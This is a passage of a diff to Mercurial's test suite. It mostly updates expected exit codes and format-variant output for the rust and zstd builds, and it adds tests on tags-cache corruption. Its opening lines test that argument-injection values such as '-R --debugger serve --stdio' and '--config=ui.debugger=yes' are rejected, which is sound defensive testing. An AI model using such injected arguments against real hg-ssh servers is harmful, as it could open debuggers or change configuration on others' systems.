--debugger serve --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', '--debugger', 'serve', '--stdio'] (missing-correct-output !) + abort: repository --debugger not found (known-bad-output !) + [255] + $ hg -R --config=ui.debugger=yes serve --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', '--config=ui.debugger=yes', 'serve', '--stdio'] (missing-correct-output !) + abort: repository --config=ui.debugger=yes not found (known-bad-output !) + [255] + $ hg -R narf serv --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio'] (missing-correct-output !) + abort: repository narf not found (known-bad-output !) + [255] +If the repo does exist, rhg finds an unsupported command and falls back to Python +which still does the right thing + $ hg init narf + $ hg -R narf serv --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio'] + [255] +#endif Test hg-ssh using a helper script that will restore PYTHONPATH (which might have been cleared by a hg.exe wrapper) and invoke hg-ssh with the right @@ -463,7 +487,7 @@ remote: Permission denied remote: pretxnopen.hg-ssh hook failed abort: push failed on remote - [255] + [100] $ cd $TESTTMP @@ -518,9 +542,11 @@ devel-peer-request: pairs: 81 bytes sending hello command sending between command - remote: 463 (sshv1 !) + remote: 444 (sshv1 no-rust !) + remote: 463 (sshv1 rust !) protocol upgraded to exp-ssh-v2-0003 (sshv2 !) - remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-rust !) + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (rust !) remote: 1 (sshv1 !) devel-peer-request: protocaps devel-peer-request: caps: * bytes (glob) @@ -537,7 +563,7 @@ no changes found devel-peer-request: getbundle devel-peer-request: bookmarks: 1 bytes - devel-peer-request: bundlecaps: 289 bytes + devel-peer-request: bundlecaps: 270 bytes devel-peer-request: cg: 1 bytes devel-peer-request: common: 122 bytes devel-peer-request: heads: 122 bytes @@ -655,7 +681,7 @@ remote: rollback completed remote: pretxnchangegroup.fail hook failed abort: push failed on remote - [255] + [100] abort during pull is properly reported as such @@ -670,7 +696,7 @@ searching for changes remote: abort: this is an exercise abort: pull failed on remote - [255] + [100] abort with no error hint when there is a ssh problem when pulling diff --git a/tests/test-static-http.t b/tests/test-static-http.t --- a/tests/test-static-http.t +++ b/tests/test-static-http.t @@ -231,8 +231,6 @@ /.hg/bookmarks /.hg/bookmarks.current /.hg/cache/hgtagsfnodes1 - /.hg/cache/rbc-names-v1 - /.hg/cache/rbc-revs-v1 /.hg/dirstate /.hg/requires /.hg/store/00changelog.i @@ -248,8 +246,6 @@ /remote-with-names/.hg/bookmarks.current /remote-with-names/.hg/cache/branch2-served /remote-with-names/.hg/cache/hgtagsfnodes1 - /remote-with-names/.hg/cache/rbc-names-v1 - /remote-with-names/.hg/cache/rbc-revs-v1 /remote-with-names/.hg/cache/tags2-served /remote-with-names/.hg/dirstate /remote-with-names/.hg/localtags @@ -266,7 +262,6 @@ /remote/.hg/cache/branch2-served /remote/.hg/cache/hgtagsfnodes1 /remote/.hg/cache/rbc-names-v1 - /remote/.hg/cache/rbc-revs-v1 /remote/.hg/cache/tags2-served /remote/.hg/dirstate /remote/.hg/localtags @@ -288,8 +283,6 @@ /sub/.hg/bookmarks /sub/.hg/bookmarks.current /sub/.hg/cache/hgtagsfnodes1 - /sub/.hg/cache/rbc-names-v1 - /sub/.hg/cache/rbc-revs-v1 /sub/.hg/dirstate /sub/.hg/requires /sub/.hg/store/00changelog.i diff --git a/tests/test-stream-bundle-v2.t b/tests/test-stream-bundle-v2.t --- a/tests/test-stream-bundle-v2.t +++ b/tests/test-stream-bundle-v2.t @@ -46,9 +46,13 @@ $ hg bundle -a --type="none-v2;stream=v2" bundle.hg $ hg debugbundle bundle.hg Stream params: {} - stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) + stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (no-zstd !) + stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (zstd no-rust !) + stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Cpersistent-nodemap%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (rust !) $ hg debugbundle --spec bundle.hg - none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore + none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore (no-zstd !) + none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore (zstd no-rust !) + none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Cpersistent-nodemap%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore (rust !) Test that we can apply the bundle as a stream clone bundle diff --git a/tests/test-strip.t b/tests/test-strip.t --- a/tests/test-strip.t +++ b/tests/test-strip.t @@ -427,7 +427,7 @@ strip failed, unrecovered changes stored in '$TESTTMP/test/.hg/strip-backup/*-temp.hg' (glob) (fix the problem, then recover the changesets with "hg unbundle '$TESTTMP/test/.hg/strip-backup/*-temp.hg'") (glob) abort: pretxnchangegroup.bad hook exited with status 1 - [255] + [40] $ restore $ hg log -G o changeset: 4:443431ffac4f diff --git a/tests/test-tag.t b/tests/test-tag.t --- a/tests/test-tag.t +++ b/tests/test-tag.t @@ -290,7 +290,7 @@ $ rm -f .hg/last-message.txt $ HGEDITOR="\"sh\" \"`pwd`/editor.sh\"" hg tag custom-tag -e abort: pretag.test-saving-lastmessage hook exited with status 1 - [255] + [40] $ test -f .hg/last-message.txt [1] @@ -325,7 +325,7 @@ note: commit message saved in .hg/last-message.txt note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt custom tag message second line diff --git a/tests/test-tags.t b/tests/test-tags.t --- a/tests/test-tags.t +++ b/tests/test-tags.t @@ -104,7 +104,7 @@ 0010: ff ff ff ff ff ff ff ff b9 15 46 36 26 b7 b4 a7 |..........F6&...| 0020: 73 e0 9e e3 c5 2f 51 0e 19 e0 5e 1f f9 66 d8 59 |s..../Q...^..f.Y| $ hg debugtagscache - 0 acb14030fe0a21b60322c440ad2d20cf7685a376 missing/invalid + 0 acb14030fe0a21b60322c440ad2d20cf7685a376 missing 1 b9154636be938d3d431e75a7c906504a079bfe07 26b7b4a773e09ee3c52f510e19e05e1ff966d859 Repeat with cold tag cache: @@ -381,7 +381,7 @@ $ hg debugtagscache | tail -2 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d - 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 missing/invalid + 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 missing $ hg tags tip 5:8dbfe60eff30 bar 1:78391a272241 @@ -389,6 +389,77 @@ 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8af31de17fab7422878ee5a2dadbc943d +If the 4 bytes of node hash for a record don't match an existing node, the entry +is flagged as invalid. + + >>> import os + >>> with open(".hg/cache/hgtagsfnodes1", "rb+") as fp: + ... fp.seek(-24, os.SEEK_END) and None + ... fp.write(b'\xde\xad') and None + + $ f --size --hexdump .hg/cache/hgtagsfnodes1 + .hg/cache/hgtagsfnodes1: size=144 + 0000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................| + 0010: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................| + 0020: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................| + 0030: 7a 94 12 77 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |z..w.....1....B(| + 0040: 78 ee 5a 2d ad bc 94 3d 6f a4 50 21 7d 3b 71 8c |x.Z-...=o.P!};q.| + 0050: 96 4e f3 7b 89 e5 50 eb da fd 57 89 e7 6c e1 b0 |.N.{..P...W..l..| + 0060: 0c 19 2d 7d 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |..-}.....1....B(| + 0070: 78 ee 5a 2d ad bc 94 3d de ad e6 0e 0c 04 f2 a8 |x.Z-...=........| + 0080: af 31 de 17 fa b7 42 28 78 ee 5a 2d ad bc 94 3d |.1....B(x.Z-...=| + + $ hg debugtagscache | tail -2 + 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d + 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 invalid + + $ hg tags + tip 5:8dbfe60eff30 + bar 1:78391a272241 + +BUG: If the filenode part of an entry in hgtagsfnodes is corrupt and +tags2-visible is missing, `hg tags` aborts. Corrupting the leading 4 bytes of +node hash (as above) doesn't seem to trigger the issue. Also note that the +debug command hides the corruption, both with and without tags2-visible. + + $ mv .hg/cache/hgtagsfnodes1 .hg/cache/hgtagsfnodes1.bak + $ hg debugupdatecaches + + >>> import os + >>> with open(".hg/cache/hgtagsfnodes1", "rb+") as fp: + ... fp.seek(-16, os.SEEK_END) and None + ... fp.write(b'\xde\xad') and None + + $ f --size --hexdump .hg/cache/hgtagsfnodes1 + .hg/cache/hgtagsfnodes1: size=144 + 0000: bb d1 79 df 00 00 00 00 00 00 00 00 00 00 00 00 |..y.............| + 0010: 00 00 00 00 00 00 00 00 78 39 1a 27 0c 04 f2 a8 |........x9.'....| + 0020: af 31 de 17 fa b7 42 28 78 ee 5a 2d ad bc 94 3d |.1....B(x.Z-...=| + 0030: 7a 94 12 77 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |z..w.....1....B(| + 0040: 78 ee 5a 2d ad bc 94 3d 6f a4 50 21 7d 3b 71 8c |x.Z-...=o.P!};q.| + 0050: 96 4e f3 7b 89 e5 50 eb da fd 57 89 e7 6c e1 b0 |.N.{..P...W..l..| + 0060: 0c 19 2d 7d 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |..-}.....1....B(| + 0070: 78 ee 5a 2d ad bc 94 3d 8d bf e6 0e 0c 04 f2 a8 |x.Z-...=........| + 0080: de ad de 17 fa b7 42 28 78 ee 5a 2d ad bc 94 3d |......B(x.Z-...=| + + $ hg debugtagscache | tail -2 + 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d + 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d (unknown node) + + $ rm -f .hg/cache/tags2-visible + $ hg debugtagscache | tail -2 + 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d + 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d (unknown node) + + $ hg tags + tip 5:8dbfe60eff30 + bar 1:78391a272241 + +BUG: Unless this file is restored, the `hg tags` in the next unix-permissions +conditional will fail: "abort: data/.hgtags.i@0c04f2a8dead: no match found" + + $ mv .hg/cache/hgtagsfnodes1.bak .hg/cache/hgtagsfnodes1 + #if unix-permissions no-root Errors writing to .hgtags fnodes cache are silently ignored @@ -405,7 +476,7 @@ $ hg blackbox -l 6 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> couldn't write cache/hgtagsfnodes1: [Errno *] * (glob) - 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 3/4 cache hits/lookups in * seconds (glob) + 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 2/4 cache hits/lookups in * seconds (glob) 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> writing .hg/cache/tags2-visible with 1 tags 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags exited 0 after * seconds (glob) 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> blackbox -l 6 @@ -420,7 +491,7 @@ $ hg blackbox -l 6 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> writing 24 bytes to cache/hgtagsfnodes1 - 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 3/4 cache hits/lookups in * seconds (glob) + 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 2/4 cache hits/lookups in * seconds (glob) 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> writing .hg/cache/tags2-visible with 1 tags 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags exited 0 after * seconds (glob) 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> blackbox -l 6 diff --git a/tests/test-template-map.t b/tests/test-template-map.t --- a/tests/test-template-map.t +++ b/tests/test-template-map.t @@ -1606,7 +1606,7 @@ $ hg bisect -g 1 $ hg bisect -b 3 --noupdate - Testing changeset 2:97054abb4ab8 (2 changesets remaining, ~1 tests) + Testing changeset 2:97054abb4ab8 "no person" (2 changesets remaining, ~1 tests) $ hg log -T bisect -r 0:4 changeset: 0:1e4e1b8f71e0 bisect: good (implicit) diff --git a/tests/test-transplant.t b/tests/test-transplant.t --- a/tests/test-transplant.t +++ b/tests/test-transplant.t @@ -1091,7 +1091,7 @@ transaction abort! rollback completed abort: pretxncommit.abort hook exited with status 1 - [255] + [40] $ cat >> .hg/hgrc <<EOF > [hooks] > pretxncommit.abort = ! diff --git a/tests/test-treemanifest.t b/tests/test-treemanifest.t --- a/tests/test-treemanifest.t +++ b/tests/test-treemanifest.t @@ -832,10 +832,13 @@ Packed bundle $ hg -R deeprepo debugcreatestreamclonebundle repo-packed.hg - writing 5330 bytes for 18 files - bundle requirements: generaldelta, revlogv1, sparserevlog, treemanifest + writing 5330 bytes for 18 files (no-zstd !) + writing 5400 bytes for 18 files (zstd !) + bundle requirements: generaldelta, revlogv1, sparserevlog, treemanifest (no-rust !) + bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog, treemanifest (rust !) $ hg debugbundle --spec repo-packed.hg - none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog%2Ctreemanifest + none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog%2Ctreemanifest (no-rust !) + none-packed1;requirements%3Dgeneraldelta%2Cpersistent-nodemap%2Crevlogv1%2Csparserevlog%2Ctreemanifest (rust !) #endif diff --git a/tests/test-unamend.t b/tests/test-unamend.t --- a/tests/test-unamend.t +++ b/tests/test-unamend.t @@ -39,7 +39,7 @@ $ hg unamend abort: changeset must have one predecessor, found 0 predecessors - [255] + [10] Unamend on clean wdir and tip diff --git a/tests/test-uncommit.t b/tests/test-uncommit.t --- a/tests/test-uncommit.t +++ b/tests/test-uncommit.t @@ -114,12 +114,12 @@ $ hg uncommit nothinghere abort: cannot uncommit "nothinghere" (file does not exist) - [255] + [10] $ hg status $ hg uncommit file-abc abort: cannot uncommit "file-abc" (file was not changed in working directory parent) - [255] + [10] $ hg status Try partial uncommit, also moves bookmark @@ -419,7 +419,7 @@ $ hg uncommit abort: cannot uncommit merge changeset - [255] + [10] $ hg status $ hg log -G -T '{rev}:{node} {desc}' --hidden @@ -585,12 +585,12 @@ $ hg uncommit emptydir abort: cannot uncommit "emptydir" (file was untracked in working directory parent) - [255] + [10] $ cd emptydir $ hg uncommit . abort: cannot uncommit "emptydir" (file was untracked in working directory parent) - [255] + [10] $ hg status $ cd .. diff --git a/tests/test-up-local-change.t b/tests/test-up-local-change.t --- a/tests/test-up-local-change.t +++ b/tests/test-up-local-change.t @@ -175,7 +175,7 @@ $ hg up 1 b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ rm b test conflicting untracked ignored file @@ -195,7 +195,7 @@ $ hg up 'desc("add ignored file")' ignored: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] test a local add diff --git a/tests/test-update-branches.t b/tests/test-update-branches.t --- a/tests/test-update-branches.t +++ b/tests/test-update-branches.t @@ -324,7 +324,7 @@ $ hg up -q 4 abort: conflicting changes (commit or update --clean to discard changes) - [255] + [20] $ hg up -m 4 merging a warning: conflicts while merging a! (edit, then use 'hg resolve --mark') diff --git a/tests/test-upgrade-repo.t b/tests/test-upgrade-repo.t --- a/tests/test-upgrade-repo.t +++ b/tests/test-upgrade-repo.t @@ -3,6 +3,9 @@ $ cat >> $HGRCPATH << EOF > [extensions] > share = + > [format] + > # stabilize test accross variant + > revlog-compression=zlib > EOF store and revlogv1 are required in source @@ -21,7 +24,7 @@ > EOF $ hg -R no-revlogv1 debugupgraderepo - abort: cannot upgrade repository; requirement missing: revlogv1 + abort: cannot upgrade repository; missing a revlog version [255] Cannot upgrade shared repositories @@ -58,9 +61,10 @@ generaldelta: yes share-safe: no sparserevlog: yes - sidedata: no - persistent-nodemap: no + persistent-nodemap: no (no-rust !) + persistent-nodemap: yes (rust !) copies-sdc: no + revlog-v2: no plain-cl-delta: yes compression: zlib compression-level: default @@ -71,11 +75,13 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zlib zlib zstd (zstd !) compression-level: default default default $ hg debugformat --verbose --config format.usefncache=no format-variant repo config default @@ -84,11 +90,13 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zlib zlib zstd (zstd !) compression-level: default default default $ hg debugformat --verbose --config format.usefncache=no --color=debug format-variant repo config default @@ -97,11 +105,13 @@ [formatvariant.name.uptodate|generaldelta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] [formatvariant.name.uptodate|share-safe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|sparserevlog: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] - [formatvariant.name.uptodate|sidedata: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] - [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] + [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] (no-rust !) + [formatvariant.name.mismatchdefault|persistent-nodemap:][formatvariant.repo.mismatchdefault| yes][formatvariant.config.special| yes][formatvariant.default| no] (rust !) [formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] + [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|plain-cl-delta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] - [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] + [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] (no-zstd !) + [formatvariant.name.mismatchdefault|compression: ][formatvariant.repo.mismatchdefault| zlib][formatvariant.config.special| zlib][formatvariant.default| zstd] (zstd !) [formatvariant.name.uptodate|compression-level: ][formatvariant.repo.uptodate| default][formatvariant.config.default| default][formatvariant.default| default] $ hg debugformat -Tjson [ @@ -136,21 +146,23 @@ "repo": true }, { + "config": false, (no-rust !) + "config": true, (rust !) + "default": false, + "name": "persistent-nodemap", + "repo": false (no-rust !) + "repo": true (rust !) + }, + { "config": false, "default": false, - "name": "sidedata", + "name": "copies-sdc", "repo": false }, { "config": false, "default": false, - "name": "persistent-nodemap", - "repo": false - }, - { - "config": false, - "default": false, - "name": "copies-sdc", + "name": "revlog-v2", "repo": false }, { @@ -161,7 +173,8 @@ }, { "config": "zlib", - "default": "zlib", + "default": "zlib", (no-zstd !) + "default": "zstd", (zstd !) "name": "compression", "repo": "zlib" }, @@ -177,7 +190,8 @@ performing an upgrade with "--run" will make the following changes: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) processed revlogs: - all-filelogs @@ -201,7 +215,8 @@ $ hg debugupgraderepo --quiet requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) processed revlogs: - all-filelogs @@ -216,7 +231,8 @@ performing an upgrade with "--run" will make the following changes: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -247,7 +263,8 @@ performing an upgrade with "--run" will make the following changes: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -272,7 +289,8 @@ $ hg debugupgrade --optimize re-delta-parent --quiet requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -303,9 +321,9 @@ generaldelta: no share-safe: no sparserevlog: no - sidedata: no persistent-nodemap: no copies-sdc: no + revlog-v2: no plain-cl-delta: yes compression: zlib compression-level: default @@ -316,11 +334,13 @@ generaldelta: no yes yes share-safe: no no no sparserevlog: no yes yes - sidedata: no no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: no yes no (rust !) copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zlib zlib zstd (zstd !) compression-level: default default default $ hg debugformat --verbose --config format.usegeneraldelta=no format-variant repo config default @@ -329,11 +349,13 @@ generaldelta: no no yes share-safe: no no no sparserevlog: no no yes - sidedata: no no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: no yes no (rust !) copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zlib zlib zstd (zstd !) compression-level: default default default $ hg debugformat --verbose --config format.usegeneraldelta=no --color=debug format-variant repo config default @@ -342,11 +364,13 @@ [formatvariant.name.mismatchdefault|generaldelta: ][formatvariant.repo.mismatchdefault| no][formatvariant.config.special| no][formatvariant.default| yes] [formatvariant.name.uptodate|share-safe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.mismatchdefault|sparserevlog: ][formatvariant.repo.mismatchdefault| no][formatvariant.config.special| no][formatvariant.default| yes] - [formatvariant.name.uptodate|sidedata: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] - [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] + [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] (no-rust !) + [formatvariant.name.mismatchconfig|persistent-nodemap:][formatvariant.repo.mismatchconfig| no][formatvariant.config.special| yes][formatvariant.default| no] (rust !) [formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] + [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|plain-cl-delta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] - [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] + [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] (no-zstd !) + [formatvariant.name.mismatchdefault|compression: ][formatvariant.repo.mismatchdefault| zlib][formatvariant.config.special| zlib][formatvariant.default| zstd] (zstd !) [formatvariant.name.uptodate|compression-level: ][formatvariant.repo.uptodate| default][formatvariant.config.default| default][formatvariant.default| default] $ hg debugupgraderepo repository lacks features recommended by current config options: @@ -363,12 +387,16 @@ sparserevlog in order to limit disk reading and memory usage on older version, the span of a delta chain from its root to its end is limited, whatever the relevant data in this span. This can severly limit Mercurial ability to build good chain of delta resulting is much more storage space being taken and limit reusability of on disk delta during exchange. + persistent-nodemap (rust !) + persist the node -> rev mapping on disk to speedup lookup (rust !) + (rust !) performing an upgrade with "--run" will make the following changes: requirements preserved: revlogv1, store - added: dotencode, fncache, generaldelta, sparserevlog + added: dotencode, fncache, generaldelta, sparserevlog (no-rust !) + added: dotencode, fncache, generaldelta, persistent-nodemap, sparserevlog (rust !) fncache repository will be more resilient to storing certain paths and performance of certain operations should be improved @@ -382,6 +410,9 @@ sparserevlog Revlog supports delta chain with more unused data between payload. These gaps will be skipped at read time. This allows for better delta chains, making a better compression and faster exchange with server. + persistent-nodemap (rust !) + Speedup revision lookup by node id. (rust !) + (rust !) processed revlogs: - all-filelogs - changelog @@ -404,7 +435,8 @@ $ hg debugupgraderepo --quiet requirements preserved: revlogv1, store - added: dotencode, fncache, generaldelta, sparserevlog + added: dotencode, fncache, generaldelta, sparserevlog (no-rust !) + added: dotencode, fncache, generaldelta, persistent-nodemap, sparserevlog (rust !) processed revlogs: - all-filelogs @@ -424,6 +456,9 @@ sparserevlog in order to limit disk reading and memory usage on older version, the span of a delta chain from its root to its end is limited, whatever the relevant data in this span. This can severly limit Mercurial ability to build good chain of delta resulting is much more storage space being taken and limit reusability of on disk delta during exchange. + persistent-nodemap (rust !) + persist the node -> rev mapping on disk to speedup lookup (rust !) + (rust !) repository lacks features used by the default config options: dotencode @@ -434,7 +469,8 @@ requirements preserved: revlogv1, store - added: fncache, generaldelta, sparserevlog + added: fncache, generaldelta, sparserevlog (no-rust !) + added: fncache, generaldelta, persistent-nodemap, sparserevlog (rust !) fncache repository will be more resilient to storing certain paths and performance of certain operations should be improved @@ -445,6 +481,9 @@ sparserevlog Revlog supports delta chain with more unused data between payload. These gaps will be skipped at read time. This allows for better delta chains, making a better compression and faster exchange with server. + persistent-nodemap (rust !) + Speedup revision lookup by node id. (rust !) + (rust !) processed revlogs: - all-filelogs - changelog @@ -503,7 +542,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, revlogv1, store + preserved: dotencode, fncache, revlogv1, store (no-rust !) + preserved: dotencode, fncache, persistent-nodemap, revlogv1, store (rust !) added: generaldelta generaldelta @@ -544,6 +584,7 @@ $ cat .hg/upgradebackup.*/requires dotencode fncache + persistent-nodemap (rust !) revlogv1 store @@ -553,6 +594,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 store @@ -604,7 +646,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) added: sparserevlog sparserevlog @@ -632,11 +675,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at 